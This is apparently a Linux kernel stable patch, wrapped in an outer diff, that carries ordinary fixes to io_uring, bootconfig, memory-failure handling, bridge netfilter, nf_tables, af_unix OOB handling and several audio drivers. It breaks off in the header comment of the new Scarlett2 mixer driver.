+index 68f1b6f8699a6..958c3b6190205 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -2426,6 +2426,14 @@ static int io_cqring_wait(struct io_ring_ctx *ctx, int min_events,
+ 			return 0;
+ 	} while (ret > 0);
+ 
++	if (uts) {
++		struct timespec64 ts;
++
++		if (get_timespec64(&ts, uts))
++			return -EFAULT;
++		timeout = ktime_add_ns(timespec64_to_ktime(ts), ktime_get_ns());
++	}
++
+ 	if (sig) {
+ #ifdef CONFIG_COMPAT
+ 		if (in_compat_syscall())
+@@ -2439,14 +2447,6 @@ static int io_cqring_wait(struct io_ring_ctx *ctx, int min_events,
+ 			return ret;
+ 	}
+ 
+-	if (uts) {
+-		struct timespec64 ts;
+-
+-		if (get_timespec64(&ts, uts))
+-			return -EFAULT;
+-		timeout = ktime_add_ns(timespec64_to_ktime(ts), ktime_get_ns());
+-	}
+-
+ 	init_waitqueue_func_entry(&iowq.wq, io_wake_function);
+ 	iowq.wq.private = current;
+ 	INIT_LIST_HEAD(&iowq.wq.entry);
+diff --git a/lib/bootconfig.c b/lib/bootconfig.c
+index c59d26068a640..8841554432d5b 100644
+--- a/lib/bootconfig.c
++++ b/lib/bootconfig.c
+@@ -61,9 +61,12 @@ static inline void * __init xbc_alloc_mem(size_t size)
+ 	return memblock_alloc(size, SMP_CACHE_BYTES);
+ }
+ 
+-static inline void __init xbc_free_mem(void *addr, size_t size)
++static inline void __init xbc_free_mem(void *addr, size_t size, bool early)
+ {
+-	memblock_free(addr, size);
++	if (early)
++		memblock_free(addr, size);
++	else if (addr)
++		memblock_free_late(__pa(addr), size);
+ }
+ 
+ #else /* !__KERNEL__ */
+@@ -73,7 +76,7 @@ static inline void *xbc_alloc_mem(size_t size)
+ 	return malloc(size);
+ }
+ 
+-static inline void xbc_free_mem(void *addr, size_t size)
++static inline void xbc_free_mem(void *addr, size_t size, bool early)
+ {
+ 	free(addr);
+ }
+@@ -904,13 +907,13 @@ static int __init xbc_parse_tree(void)
+  * If you need to reuse xbc_init() with new boot config, you can
+  * use this.
+  */
+-void __init xbc_exit(void)
++void __init _xbc_exit(bool early)
+ {
+-	xbc_free_mem(xbc_data, xbc_data_size);
++	xbc_free_mem(xbc_data, xbc_data_size, early);
+ 	xbc_data = NULL;
+ 	xbc_data_size = 0;
+ 	xbc_node_num = 0;
+-	xbc_free_mem(xbc_nodes, sizeof(struct xbc_node) * XBC_NODE_MAX);
++	xbc_free_mem(xbc_nodes, sizeof(struct xbc_node) * XBC_NODE_MAX, early);
+ 	xbc_nodes = NULL;
+ 	brace_index = 0;
+ }
+@@ -963,7 +966,7 @@ int __init xbc_init(const char *data, size_t size, const char **emsg, int *epos)
+ 	if (!xbc_nodes) {
+ 		if (emsg)
+ 			*emsg = "Failed to allocate bootconfig nodes";
+-		xbc_exit();
++		_xbc_exit(true);
+ 		return -ENOMEM;
+ 	}
+ 	memset(xbc_nodes, 0, sizeof(struct xbc_node) * XBC_NODE_MAX);
+@@ -977,7 +980,7 @@ int __init xbc_init(const char *data, size_t size, const char **emsg, int *epos)
+ 			*epos = xbc_err_pos;
+ 		if (emsg)
+ 			*emsg = xbc_err_msg;
+-		xbc_exit();
++		_xbc_exit(true);
+ 	} else
+ 		ret = xbc_node_num;
+ 
+diff --git a/mm/memory-failure.c b/mm/memory-failure.c
+index 5b846ed5dcbe9..be58ce9992595 100644
+--- a/mm/memory-failure.c
++++ b/mm/memory-failure.c
+@@ -84,11 +84,23 @@ static int __page_handle_poison(struct page *page)
+ {
+ 	int ret;
+ 
+-	zone_pcp_disable(page_zone(page));
++	/*
++	 * zone_pcp_disable() can't be used here. It will
++	 * hold pcp_batch_high_lock and dissolve_free_huge_page() might hold
++	 * cpu_hotplug_lock via static_key_slow_dec() when hugetlb vmemmap
++	 * optimization is enabled. This would break the current lock
++	 * dependency chain and lead to deadlock.
++	 * Disabling pcp before dissolving the page was a deterministic
++	 * approach because we made sure that those pages cannot end up in any
++	 * PCP list. Draining PCP lists expels those pages to the buddy system,
++	 * but nothing guarantees that those pages do not get back to a PCP
++	 * queue if we need to refill them.
++	 */
+ 	ret = dissolve_free_huge_page(page);
+-	if (!ret)
++	if (!ret) {
++		drain_all_pages(page_zone(page));
+ 		ret = take_page_off_buddy(page);
+-	zone_pcp_enable(page_zone(page));
++	}
+ 
+ 	return ret;
+ }
+diff --git a/net/bridge/br_input.c b/net/bridge/br_input.c
+index 6bb272894c960..b94a1783902ea 100644
+--- a/net/bridge/br_input.c
++++ b/net/bridge/br_input.c
+@@ -30,7 +30,7 @@ br_netif_receive_skb(struct net *net, struct sock *sk, struct sk_buff *skb)
+ 	return netif_receive_skb(skb);
+ }
+ 
+-static int br_pass_frame_up(struct sk_buff *skb)
++static int br_pass_frame_up(struct sk_buff *skb, bool promisc)
+ {
+ 	struct net_device *indev, *brdev = BR_INPUT_SKB_CB(skb)->brdev;
+ 	struct net_bridge *br = netdev_priv(brdev);
+@@ -65,6 +65,8 @@ static int br_pass_frame_up(struct sk_buff *skb)
+ 	br_multicast_count(br, NULL, skb, br_multicast_igmp_type(skb),
+ 			   BR_MCAST_DIR_TX);
+ 
++	BR_INPUT_SKB_CB(skb)->promisc = promisc;
++
+ 	return NF_HOOK(NFPROTO_BRIDGE, NF_BR_LOCAL_IN,
+ 		       dev_net(indev), NULL, skb, indev, NULL,
+ 		       br_netif_receive_skb);
+@@ -82,6 +84,7 @@ int br_handle_frame_finish(struct net *net, struct sock *sk, struct sk_buff *skb
+ 	struct net_bridge_mcast *brmctx;
+ 	struct net_bridge_vlan *vlan;
+ 	struct net_bridge *br;
++	bool promisc;
+ 	u16 vid = 0;
+ 	u8 state;
+ 
+@@ -120,7 +123,9 @@ int br_handle_frame_finish(struct net *net, struct sock *sk, struct sk_buff *skb
+ 	if (p->flags & BR_LEARNING)
+ 		br_fdb_update(br, p, eth_hdr(skb)->h_source, vid, 0);
+ 
+-	local_rcv = !!(br->dev->flags & IFF_PROMISC);
++	promisc = !!(br->dev->flags & IFF_PROMISC);
++	local_rcv = promisc;
++
+ 	if (is_multicast_ether_addr(eth_hdr(skb)->h_dest)) {
+ 		/* by definition the broadcast is also a multicast address */
+ 		if (is_broadcast_ether_addr(eth_hdr(skb)->h_dest)) {
+@@ -183,7 +188,7 @@ int br_handle_frame_finish(struct net *net, struct sock *sk, struct sk_buff *skb
+ 		unsigned long now = jiffies;
+ 
+ 		if (test_bit(BR_FDB_LOCAL, &dst->flags))
+-			return br_pass_frame_up(skb);
++			return br_pass_frame_up(skb, false);
+ 
+ 		if (now != dst->used)
+ 			dst->used = now;
+@@ -196,7 +201,7 @@ int br_handle_frame_finish(struct net *net, struct sock *sk, struct sk_buff *skb
+ 	}
+ 
+ 	if (local_rcv)
+-		return br_pass_frame_up(skb);
++		return br_pass_frame_up(skb, promisc);
+ 
+ out:
+ 	return 0;
+@@ -368,6 +373,8 @@ static rx_handler_result_t br_handle_frame(struct sk_buff **pskb)
+ 				goto forward;
+ 		}
+ 
++		BR_INPUT_SKB_CB(skb)->promisc = false;
++
+ 		/* The else clause should be hit when nf_hook():
+ 		 *   - returns < 0 (drop/error)
+ 		 *   - returns = 0 (stolen/nf_queue)
+diff --git a/net/bridge/br_netfilter_hooks.c b/net/bridge/br_netfilter_hooks.c
+index bff48d5763635..9ac70c27da835 100644
+--- a/net/bridge/br_netfilter_hooks.c
++++ b/net/bridge/br_netfilter_hooks.c
+@@ -600,11 +600,17 @@ static unsigned int br_nf_local_in(void *priv,
+ 				   struct sk_buff *skb,
+ 				   const struct nf_hook_state *state)
+ {
++	bool promisc = BR_INPUT_SKB_CB(skb)->promisc;
+ 	struct nf_conntrack *nfct = skb_nfct(skb);
+ 	const struct nf_ct_hook *ct_hook;
+ 	struct nf_conn *ct;
+ 	int ret;
+ 
++	if (promisc) {
++		nf_reset_ct(skb);
++		return NF_ACCEPT;
++	}
++
+ 	if (!nfct || skb->pkt_type == PACKET_HOST)
+ 		return NF_ACCEPT;
+ 
+diff --git a/net/bridge/br_private.h b/net/bridge/br_private.h
+index 51d010f64e066..940de95167689 100644
+--- a/net/bridge/br_private.h
++++ b/net/bridge/br_private.h
+@@ -559,6 +559,7 @@ struct br_input_skb_cb {
+ #endif
+ 	u8 proxyarp_replied:1;
+ 	u8 src_port_isolated:1;
++	u8 promisc:1;
+ #ifdef CONFIG_BRIDGE_VLAN_FILTERING
+ 	u8 vlan_filtered:1;
+ #endif
+diff --git a/net/bridge/netfilter/nf_conntrack_bridge.c b/net/bridge/netfilter/nf_conntrack_bridge.c
+index c7c27ada67044..e60c38670f220 100644
+--- a/net/bridge/netfilter/nf_conntrack_bridge.c
++++ b/net/bridge/netfilter/nf_conntrack_bridge.c
+@@ -294,18 +294,24 @@ static unsigned int nf_ct_bridge_pre(void *priv, struct sk_buff *skb,
+ static unsigned int nf_ct_bridge_in(void *priv, struct sk_buff *skb,
+ 				    const struct nf_hook_state *state)
+ {
+-	enum ip_conntrack_info ctinfo;
++	bool promisc = BR_INPUT_SKB_CB(skb)->promisc;
++	struct nf_conntrack *nfct = skb_nfct(skb);
+ 	struct nf_conn *ct;
+ 
+-	if (skb->pkt_type == PACKET_HOST)
++	if (promisc) {
++		nf_reset_ct(skb);
++		return NF_ACCEPT;
++	}
++
++	if (!nfct || skb->pkt_type == PACKET_HOST)
+ 		return NF_ACCEPT;
+ 
+ 	/* nf_conntrack_confirm() cannot handle concurrent clones,
+ 	 * this happens for broad/multicast frames with e.g. macvlan on top
+ 	 * of the bridge device.
+ 	 */
+-	ct = nf_ct_get(skb, &ctinfo);
+-	if (!ct || nf_ct_is_confirmed(ct) || nf_ct_is_template(ct))
++	ct = container_of(nfct, struct nf_conn, ct_general);
++	if (nf_ct_is_confirmed(ct) || nf_ct_is_template(ct))
+ 		return NF_ACCEPT;
+ 
+ 	/* let inet prerouting call conntrack again */
+diff --git a/net/dsa/dsa2.c b/net/dsa/dsa2.c
+index 5417f7b1187cb..98f8648791755 100644
+--- a/net/dsa/dsa2.c
++++ b/net/dsa/dsa2.c
+@@ -425,6 +425,24 @@ static int dsa_tree_setup_default_cpu(struct dsa_switch_tree *dst)
+ 	return 0;
+ }
+ 
++static struct dsa_port *
++dsa_switch_preferred_default_local_cpu_port(struct dsa_switch *ds)
++{
++	struct dsa_port *cpu_dp;
++
++	if (!ds->ops->preferred_default_local_cpu_port)
++		return NULL;
++
++	cpu_dp = ds->ops->preferred_default_local_cpu_port(ds);
++	if (!cpu_dp)
++		return NULL;
++
++	if (WARN_ON(!dsa_port_is_cpu(cpu_dp) || cpu_dp->ds != ds))
++		return NULL;
++
++	return cpu_dp;
++}
++
+ /* Perform initial assignment of CPU ports to user ports and DSA links in the
+  * fabric, giving preference to CPU ports local to each switch. Default to
+  * using the first CPU port in the switch tree if the port does not have a CPU
+@@ -432,12 +450,16 @@ static int dsa_tree_setup_default_cpu(struct dsa_switch_tree *dst)
+  */
+ static int dsa_tree_setup_cpu_ports(struct dsa_switch_tree *dst)
+ {
+-	struct dsa_port *cpu_dp, *dp;
++	struct dsa_port *preferred_cpu_dp, *cpu_dp, *dp;
+ 
+ 	list_for_each_entry(cpu_dp, &dst->ports, list) {
+ 		if (!dsa_port_is_cpu(cpu_dp))
+ 			continue;
+ 
++		preferred_cpu_dp = dsa_switch_preferred_default_local_cpu_port(cpu_dp->ds);
++		if (preferred_cpu_dp && preferred_cpu_dp != cpu_dp)
++			continue;
++
+ 		/* Prefer a local CPU port */
+ 		dsa_switch_for_each_port(dp, cpu_dp->ds) {
+ 			/* Prefer the first local CPU port found */
+diff --git a/net/netfilter/nf_flow_table_inet.c b/net/netfilter/nf_flow_table_inet.c
+index 9505f9d188ff2..6eef15648b7b0 100644
+--- a/net/netfilter/nf_flow_table_inet.c
++++ b/net/netfilter/nf_flow_table_inet.c
+@@ -21,7 +21,8 @@ nf_flow_offload_inet_hook(void *priv, struct sk_buff *skb,
+ 		proto = veth->h_vlan_encapsulated_proto;
+ 		break;
+ 	case htons(ETH_P_PPP_SES):
+-		proto = nf_flow_pppoe_proto(skb);
++		if (!nf_flow_pppoe_proto(skb, &proto))
++			return NF_ACCEPT;
+ 		break;
+ 	default:
+ 		proto = skb->protocol;
+diff --git a/net/netfilter/nf_flow_table_ip.c b/net/netfilter/nf_flow_table_ip.c
+index 6feaac9ab05c8..22bc0e3d8a0b5 100644
+--- a/net/netfilter/nf_flow_table_ip.c
++++ b/net/netfilter/nf_flow_table_ip.c
+@@ -156,7 +156,7 @@ static void nf_flow_tuple_encap(struct sk_buff *skb,
+ 		tuple->encap[i].proto = skb->protocol;
+ 		break;
+ 	case htons(ETH_P_PPP_SES):
+-		phdr = (struct pppoe_hdr *)skb_mac_header(skb);
++		phdr = (struct pppoe_hdr *)skb_network_header(skb);
+ 		tuple->encap[i].id = ntohs(phdr->sid);
+ 		tuple->encap[i].proto = skb->protocol;
+ 		break;
+@@ -267,10 +267,11 @@ static unsigned int nf_flow_xmit_xfrm(struct sk_buff *skb,
+ 	return NF_STOLEN;
+ }
+ 
+-static bool nf_flow_skb_encap_protocol(const struct sk_buff *skb, __be16 proto,
++static bool nf_flow_skb_encap_protocol(struct sk_buff *skb, __be16 proto,
+ 				       u32 *offset)
+ {
+ 	struct vlan_ethhdr *veth;
++	__be16 inner_proto;
+ 
+ 	switch (skb->protocol) {
+ 	case htons(ETH_P_8021Q):
+@@ -281,7 +282,8 @@ static bool nf_flow_skb_encap_protocol(const struct sk_buff *skb, __be16 proto,
+ 		}
+ 		break;
+ 	case htons(ETH_P_PPP_SES):
+-		if (nf_flow_pppoe_proto(skb) == proto) {
++		if (nf_flow_pppoe_proto(skb, &inner_proto) &&
++		    inner_proto == proto) {
+ 			*offset += PPPOE_SES_HLEN;
+ 			return true;
+ 		}
+@@ -310,7 +312,7 @@ static void nf_flow_encap_pop(struct sk_buff *skb,
+ 			skb_reset_network_header(skb);
+ 			break;
+ 		case htons(ETH_P_PPP_SES):
+-			skb->protocol = nf_flow_pppoe_proto(skb);
++			skb->protocol = __nf_flow_pppoe_proto(skb);
+ 			skb_pull(skb, PPPOE_SES_HLEN);
+ 			skb_reset_network_header(skb);
+ 			break;
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 8152a69d82681..1c4b7a8ec2cc6 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -2891,7 +2891,7 @@ static const struct nft_expr_type *__nft_expr_type_get(u8 family,
+ {
+ 	const struct nft_expr_type *type, *candidate = NULL;
+ 
+-	list_for_each_entry(type, &nf_tables_expressions, list) {
++	list_for_each_entry_rcu(type, &nf_tables_expressions, list) {
+ 		if (!nla_strcmp(nla, type->name)) {
+ 			if (!type->family && !candidate)
+ 				candidate = type;
+@@ -2923,9 +2923,13 @@ static const struct nft_expr_type *nft_expr_type_get(struct net *net,
+ 	if (nla == NULL)
+ 		return ERR_PTR(-EINVAL);
+ 
++	rcu_read_lock();
+ 	type = __nft_expr_type_get(family, nla);
+-	if (type != NULL && try_module_get(type->owner))
++	if (type != NULL && try_module_get(type->owner)) {
++		rcu_read_unlock();
+ 		return type;
++	}
++	rcu_read_unlock();
+ 
+ 	lockdep_nfnl_nft_mutex_not_held();
+ #ifdef CONFIG_MODULES
+@@ -7171,7 +7175,7 @@ static const struct nft_object_type *__nft_obj_type_get(u32 objtype, u8 family)
+ {
+ 	const struct nft_object_type *type;
+ 
+-	list_for_each_entry(type, &nf_tables_objects, list) {
++	list_for_each_entry_rcu(type, &nf_tables_objects, list) {
+ 		if (type->family != NFPROTO_UNSPEC &&
+ 		    type->family != family)
+ 			continue;
+@@ -7187,9 +7191,13 @@ nft_obj_type_get(struct net *net, u32 objtype, u8 family)
+ {
+ 	const struct nft_object_type *type;
+ 
++	rcu_read_lock();
+ 	type = __nft_obj_type_get(objtype, family);
+-	if (type != NULL && try_module_get(type->owner))
++	if (type != NULL && try_module_get(type->owner)) {
++		rcu_read_unlock();
+ 		return type;
++	}
++	rcu_read_unlock();
+ 
+ 	lockdep_nfnl_nft_mutex_not_held();
+ #ifdef CONFIG_MODULES
+diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c
+index 58eca26162735..2299ced939c47 100644
+--- a/net/netfilter/nft_set_pipapo.c
++++ b/net/netfilter/nft_set_pipapo.c
+@@ -1994,6 +1994,8 @@ static void nft_pipapo_remove(const struct net *net, const struct nft_set *set,
+ 		rules_fx = rules_f0;
+ 
+ 		nft_pipapo_for_each_field(f, i, m) {
++			bool last = i == m->field_count - 1;
++
+ 			if (!pipapo_match_field(f, start, rules_fx,
+ 						match_start, match_end))
+ 				break;
+@@ -2006,16 +2008,18 @@ static void nft_pipapo_remove(const struct net *net, const struct nft_set *set,
+ 
+ 			match_start += NFT_PIPAPO_GROUPS_PADDED_SIZE(f);
+ 			match_end += NFT_PIPAPO_GROUPS_PADDED_SIZE(f);
+-		}
+ 
+-		if (i == m->field_count) {
+-			priv->dirty = true;
+-			pipapo_drop(m, rulemap);
+-			return;
++			if (last && f->mt[rulemap[i].to].e == e) {
++				priv->dirty = true;
++				pipapo_drop(m, rulemap);
++				return;
++			}
+ 		}
+ 
+ 		first_rule += rules_f0;
+ 	}
++
++	WARN_ON_ONCE(1); /* elem_priv not found */
+ }
+ 
+ /**
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index 0a75d76535f75..f28e2956fea58 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -2675,7 +2675,9 @@ static struct sk_buff *manage_oob(struct sk_buff *skb, struct sock *sk,
+ 					WRITE_ONCE(u->oob_skb, NULL);
+ 					consume_skb(skb);
+ 				}
+-			} else if (!(flags & MSG_PEEK)) {
++			} else if (flags & MSG_PEEK) {
++				skb = NULL;
++			} else {
+ 				skb_unlink(skb, &sk->sk_receive_queue);
+ 				WRITE_ONCE(u->oob_skb, NULL);
+ 				if (!WARN_ON_ONCE(skb_unref(skb)))
+@@ -2753,18 +2755,16 @@ static int unix_stream_read_generic(struct unix_stream_read_state *state,
+ 		last = skb = skb_peek(&sk->sk_receive_queue);
+ 		last_len = last ? last->len : 0;
+ 
++again:
+ #if IS_ENABLED(CONFIG_AF_UNIX_OOB)
+ 		if (skb) {
+ 			skb = manage_oob(skb, sk, flags, copied);
+-			if (!skb) {
++			if (!skb && copied) {
+ 				unix_state_unlock(sk);
+-				if (copied)
+-					break;
+-				goto redo;
++				break;
+ 			}
+ 		}
+ #endif
+-again:
+ 		if (skb == NULL) {
+ 			if (copied >= target)
+ 				goto unlock;
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index e8cf38dc8a5e0..77c40063d63a7 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -10122,6 +10122,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1d05, 0x115c, "TongFang GMxTGxx", ALC269_FIXUP_NO_SHUTUP),
+ 	SND_PCI_QUIRK(0x1d05, 0x121b, "TongFang GMxAGxx", ALC269_FIXUP_NO_SHUTUP),
+ 	SND_PCI_QUIRK(0x1d05, 0x1387, "TongFang GMxIXxx", ALC2XX_FIXUP_HEADSET_MIC),
++	SND_PCI_QUIRK(0x1d17, 0x3288, "Haier Boyue G42", ALC269VC_FIXUP_ACER_VCOPPERBOX_PINS),
+ 	SND_PCI_QUIRK(0x1d72, 0x1602, "RedmiBook", ALC255_FIXUP_XIAOMI_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1d72, 0x1701, "XiaomiNotebook Pro", ALC298_FIXUP_DELL1_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1d72, 0x1901, "RedmiBook 14", ALC256_FIXUP_ASUS_HEADSET_MIC),
+diff --git a/sound/soc/ti/omap3pandora.c b/sound/soc/ti/omap3pandora.c
+index a287e9747c2a1..fa92ed97dfe3b 100644
+--- a/sound/soc/ti/omap3pandora.c
++++ b/sound/soc/ti/omap3pandora.c
+@@ -7,7 +7,7 @@
+ 
+ #include <linux/clk.h>
+ #include <linux/platform_device.h>
+-#include <linux/gpio.h>
++#include <linux/gpio/consumer.h>
+ #include <linux/delay.h>
+ #include <linux/regulator/consumer.h>
+ #include <linux/module.h>
+@@ -21,12 +21,11 @@
+ 
+ #include "omap-mcbsp.h"
+ 
+-#define OMAP3_PANDORA_DAC_POWER_GPIO	118
+-#define OMAP3_PANDORA_AMP_POWER_GPIO	14
+-
+ #define PREFIX "ASoC omap3pandora: "
+ 
+ static struct regulator *omap3pandora_dac_reg;
++static struct gpio_desc *dac_power_gpio;
++static struct gpio_desc *amp_power_gpio;
+ 
+ static int omap3pandora_hw_params(struct snd_pcm_substream *substream,
+ 	struct snd_pcm_hw_params *params)
+@@ -78,9 +77,9 @@ static int omap3pandora_dac_event(struct snd_soc_dapm_widget *w,
+ 			return ret;
+ 		}
+ 		mdelay(1);
+-		gpio_set_value(OMAP3_PANDORA_DAC_POWER_GPIO, 1);
++		gpiod_set_value(dac_power_gpio, 1);
+ 	} else {
+-		gpio_set_value(OMAP3_PANDORA_DAC_POWER_GPIO, 0);
++		gpiod_set_value(dac_power_gpio, 0);
+ 		mdelay(1);
+ 		regulator_disable(omap3pandora_dac_reg);
+ 	}
+@@ -92,9 +91,9 @@ static int omap3pandora_hp_event(struct snd_soc_dapm_widget *w,
+ 	struct snd_kcontrol *k, int event)
+ {
+ 	if (SND_SOC_DAPM_EVENT_ON(event))
+-		gpio_set_value(OMAP3_PANDORA_AMP_POWER_GPIO, 1);
++		gpiod_set_value(amp_power_gpio, 1);
+ 	else
+-		gpio_set_value(OMAP3_PANDORA_AMP_POWER_GPIO, 0);
++		gpiod_set_value(amp_power_gpio, 0);
+ 
+ 	return 0;
+ }
+@@ -229,35 +228,10 @@ static int __init omap3pandora_soc_init(void)
+ 
+ 	pr_info("OMAP3 Pandora SoC init\n");
+ 
+-	ret = gpio_request(OMAP3_PANDORA_DAC_POWER_GPIO, "dac_power");
+-	if (ret) {
+-		pr_err(PREFIX "Failed to get DAC power GPIO\n");
+-		return ret;
+-	}
+-
+-	ret = gpio_direction_output(OMAP3_PANDORA_DAC_POWER_GPIO, 0);
+-	if (ret) {
+-		pr_err(PREFIX "Failed to set DAC power GPIO direction\n");
+-		goto fail0;
+-	}
+-
+-	ret = gpio_request(OMAP3_PANDORA_AMP_POWER_GPIO, "amp_power");
+-	if (ret) {
+-		pr_err(PREFIX "Failed to get amp power GPIO\n");
+-		goto fail0;
+-	}
+-
+-	ret = gpio_direction_output(OMAP3_PANDORA_AMP_POWER_GPIO, 0);
+-	if (ret) {
+-		pr_err(PREFIX "Failed to set amp power GPIO direction\n");
+-		goto fail1;
+-	}
+-
+ 	omap3pandora_snd_device = platform_device_alloc("soc-audio", -1);
+ 	if (omap3pandora_snd_device == NULL) {
+ 		pr_err(PREFIX "Platform device allocation failed\n");
+-		ret = -ENOMEM;
+-		goto fail1;
++		return -ENOMEM;
+ 	}
+ 
+ 	platform_set_drvdata(omap3pandora_snd_device, &snd_soc_card_omap3pandora);
+@@ -268,6 +242,20 @@ static int __init omap3pandora_soc_init(void)
+ 		goto fail2;
+ 	}
+ 
++	dac_power_gpio = devm_gpiod_get(&omap3pandora_snd_device->dev,
++					"dac", GPIOD_OUT_LOW);
++	if (IS_ERR(dac_power_gpio)) {
++		ret = PTR_ERR(dac_power_gpio);
++		goto fail3;
++	}
++
++	amp_power_gpio = devm_gpiod_get(&omap3pandora_snd_device->dev,
++					"amp", GPIOD_OUT_LOW);
++	if (IS_ERR(amp_power_gpio)) {
++		ret = PTR_ERR(amp_power_gpio);
++		goto fail3;
++	}
++
+ 	omap3pandora_dac_reg = regulator_get(&omap3pandora_snd_device->dev, "vcc");
+ 	if (IS_ERR(omap3pandora_dac_reg)) {
+ 		pr_err(PREFIX "Failed to get DAC regulator from %s: %ld\n",
+@@ -283,10 +271,7 @@ static int __init omap3pandora_soc_init(void)
+ 	platform_device_del(omap3pandora_snd_device);
+ fail2:
+ 	platform_device_put(omap3pandora_snd_device);
+-fail1:
+-	gpio_free(OMAP3_PANDORA_AMP_POWER_GPIO);
+-fail0:
+-	gpio_free(OMAP3_PANDORA_DAC_POWER_GPIO);
++
+ 	return ret;
+ }
+ module_init(omap3pandora_soc_init);
+@@ -295,8 +280,6 @@ static void __exit omap3pandora_soc_exit(void)
+ {
+ 	regulator_put(omap3pandora_dac_reg);
+ 	platform_device_unregister(omap3pandora_snd_device);
+-	gpio_free(OMAP3_PANDORA_AMP_POWER_GPIO);
+-	gpio_free(OMAP3_PANDORA_DAC_POWER_GPIO);
+ }
+ module_exit(omap3pandora_soc_exit);
+ 
+diff --git a/sound/usb/Makefile b/sound/usb/Makefile
+index 9ccb21a4ff8a8..64a718c766a7a 100644
+--- a/sound/usb/Makefile
++++ b/sound/usb/Makefile
+@@ -12,7 +12,7 @@ snd-usb-audio-objs := 	card.o \
+ 			mixer.o \
+ 			mixer_quirks.o \
+ 			mixer_scarlett.o \
+-			mixer_scarlett_gen2.o \
++			mixer_scarlett2.o \
+ 			mixer_us16x08.o \
+ 			mixer_s1810c.o \
+ 			pcm.o \
+diff --git a/sound/usb/mixer_quirks.c b/sound/usb/mixer_quirks.c
+index 1f32e3ae3aa31..c8d48566e1759 100644
+--- a/sound/usb/mixer_quirks.c
++++ b/sound/usb/mixer_quirks.c
+@@ -33,7 +33,7 @@
+ #include "mixer.h"
+ #include "mixer_quirks.h"
+ #include "mixer_scarlett.h"
+-#include "mixer_scarlett_gen2.h"
++#include "mixer_scarlett2.h"
+ #include "mixer_us16x08.h"
+ #include "mixer_s1810c.h"
+ #include "helper.h"
+@@ -3447,8 +3447,13 @@ int snd_usb_mixer_apply_create_quirk(struct usb_mixer_interface *mixer)
+ 	case USB_ID(0x1235, 0x8213): /* Focusrite Scarlett 8i6 3rd Gen */
+ 	case USB_ID(0x1235, 0x8214): /* Focusrite Scarlett 18i8 3rd Gen */
+ 	case USB_ID(0x1235, 0x8215): /* Focusrite Scarlett 18i20 3rd Gen */
++	case USB_ID(0x1235, 0x8206): /* Focusrite Clarett 2Pre USB */
++	case USB_ID(0x1235, 0x8207): /* Focusrite Clarett 4Pre USB */
++	case USB_ID(0x1235, 0x8208): /* Focusrite Clarett 8Pre USB */
++	case USB_ID(0x1235, 0x820a): /* Focusrite Clarett+ 2Pre */
++	case USB_ID(0x1235, 0x820b): /* Focusrite Clarett+ 4Pre */
+ 	case USB_ID(0x1235, 0x820c): /* Focusrite Clarett+ 8Pre */
+-		err = snd_scarlett_gen2_init(mixer);
++		err = snd_scarlett2_init(mixer);
+ 		break;
+ 
+ 	case USB_ID(0x041e, 0x323b): /* Creative Sound Blaster E1 */
+diff --git a/sound/usb/mixer_scarlett2.c b/sound/usb/mixer_scarlett2.c
+new file mode 100644
+index 0000000000000..bcb8b76174065
+--- /dev/null
++++ b/sound/usb/mixer_scarlett2.c
+@@ -0,0 +1,4391 @@
++// SPDX-License-Identifier: GPL-2.0
++/*
++ *   Focusrite Scarlett 2 Protocol Driver for ALSA
++ *   (including Scarlett 2nd Gen, 3rd Gen, Clarett USB, and Clarett+
++ *   series products)
++ *
++ *   Supported models:
++ *   - 6i6/18i8/18i20 Gen 2
++ *   - Solo/2i2/4i4/8i6/18i8/18i20 Gen 3
++ *   - Clarett 2Pre/4Pre/8Pre USB
++ *   - Clarett+ 2Pre/4Pre/8Pre
++ *
++ *   Copyright (c) 2018-2023 by Geoffrey D. Bennett <g at b4.vu>
++ *   Copyright (c) 2020-2021 by Vladimir Sadovnikov <sadko4u@gmail.com>
++ *   Copyright (c) 2022 by Christian Colglazier <christian@cacolglazier.com>
++ *
++ *   Based on the Scarlett (Gen 1) Driver for ALSA:
++ *
++ *   Copyright (c) 2013 by Tobias Hoffmann
++ *   Copyright (c) 2013 by Robin Gareus <robin at gareus.org>
++ *   Copyright (c) 2002 by Takashi Iwai <tiwai at suse.de>
++ *   Copyright (c) 2014 by Chris J Arges <chris.j.arges at canonical.com>
++ *
++ *   Many codes borrowed from audio.c by
++ *     Alan Cox (alan at lxorguk.ukuu.org.uk)
++ *     Thomas Sailer (sailer at ife.ee.ethz.ch)
++ *
++ *   Code cleanup:
++ *   David Henningsson <david.henningsson at canonical.com>
++ */
++
++/* The protocol was reverse engineered by looking at the communication
++ * between Focusrite Control 2.3.4 and the Focusrite(R) Scarlett 18i20
++ * (firmware 1083) using usbmon in July-August 2018.
++ *
++ * Scarlett 18i8 support added in April 2019.
++ *
++ * Scarlett 6i6 support added in June 2019 (thanks to Martin Wittmann
++ * for providing usbmon output and testing).
++ *
++ * Scarlett 4i4/8i6 Gen 3 support added in May 2020 (thanks to Laurent
++ * Debricon for donating a 4i4 and to Fredrik Unger for providing 8i6
++ * usbmon output and testing).
++ *
++ * Scarlett 18i8/18i20 Gen 3 support added in June 2020 (thanks to
++ * Darren Jaeckel, Alex Sedlack, and Clovis Lunel for providing usbmon
++ * output, protocol traces and testing).
++ *
++ * Support for loading mixer volume and mux configuration from the
++ * interface during driver initialisation added in May 2021 (thanks to
++ * Vladimir Sadovnikov for figuring out how).
++ *
++ * Support for Solo/2i2 Gen 3 added in May 2021 (thanks to Alexander
++ * Vorona for 2i2 protocol traces).
++ *
++ * Support for phantom power, direct monitoring, speaker switching,
++ * and talkback added in May-June 2021.
++ *
++ * Support for Clarett+ 8Pre added in Aug 2022 by Christian
++ * Colglazier.
++ *
++ * Support for Clarett 8Pre USB added in Sep 2023 (thanks to Philippe
++ * Perrot for confirmation).
++ *
